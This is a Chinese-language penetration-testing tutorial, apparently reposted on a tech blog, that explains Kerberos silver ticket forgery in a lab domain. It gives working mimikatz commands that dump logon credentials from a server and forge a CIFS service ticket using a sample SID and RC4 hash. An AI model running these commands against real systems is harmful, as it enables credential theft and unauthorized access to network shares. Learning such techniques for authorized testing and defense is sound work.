目录
0x01 介绍
0x02 白银票据利用
0x01 介绍
在之前的文章中,我们详细探讨了Kerberos认证的流程,现在我们将深入讨论如何利用这一流程,特别是关于白银票据伪造(Silver Tickets)的技术。白银票据伪造主要利用了Kerberos认证的第三个步骤,在这个步骤中,客户端会携带ticket向服务器的某个服务发起请求。如果验证通过,客户端即可访问服务器上的特定服务。ticket的格式如下:
Server hash(server session key + client info + end time)
其中,client info是我们已知的,end time可以根据当前时间进行伪造,server session key由TGS生成。在ticket发送给服务器之前,服务器并不知道server session key的具体内容。因此,只要我们掌握了server hash,就可以访问服务器中的特定服务。
实际上,这种方法更像是一种后门,当我们拥有server hash时,可以随时向服务器发起请求。
总结白银票据攻击的特点如下:
不需要与KDC进行交互需要服务器的NTLM hash
0x02 白银票据利用
我们将通过文件共享的方式来验证白银票据的利用。首先,尝试访问WIN7-SERVER.zhujian.comc$,发现需要输入密码才能连接。
接着,我们使用mimikatz从服务器中导出hash:
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit">log.txt
成功获取了hash和其他相关信息。
然后回到客户端,使用mimikatz伪造票据,命令如下:
mimikatz "kerberos::golden /domain: /sid: /target: /service: /rc4: /user: /ptt" exit
相关信息的获取如下:
奇域
奇域是一个专注于中式美学的国风AI绘画创作平台
30 查看详情
注意,SID不需要填写最后的-500。目标服务器的主机名应使用完整名称:
服务类型可从以下选项中选择,由于没有TGT来不断申请ticket,我们只能针对特定服务进行伪造:
用户名可以任意填写,因为在数据传输到服务器之前,服务器并不知道用户名。对于传输流程不熟悉的读者,可以参考《Windows认证 | 域认证》。
最终,我们得到的命令如下:
mimikatz.exe "kerberos::golden /domain:zhujian.com /sid:S-1-5-21-829259175-2571685386-1296789624 /target: WIN7-SERVER.zhujian.com /service:cifs /rc4:e467173f3c80e9f23084396625486f60 /user: secquan /ptt" exit
再次进行测试:
成功访问了服务器。
如果对Windows认证感兴趣,可以阅读以下文章进行学习:《Windows认证 | Windows本地认证》、《Windows认证 | 网络认证》、《Windows认证 | 域认证》、《SPN扫描》、《Kerberoasting攻击》。
推荐阅读:
离线破解Navicat密码php-fpm在nginx特定环境下的任意代码执行漏洞(CVE-2019-11043)Linux权限详解Linux文件查找命令详解Linux重定向及反弹shell详解
如果本文对你有帮助,请点击“在看”或转发,这对我是一种支持。
以上就是域渗透 | 白银票据利用的详细内容,更多请关注php中文网其它相关文章!
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。
如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 chuangxiangniao@163.com 举报,一经查实,本站将立刻删除。
发布者:程序猿,转转请注明出处:https://www.chuangxiangniao.com/p/259760.html
微信扫一扫 
支付宝扫一扫 
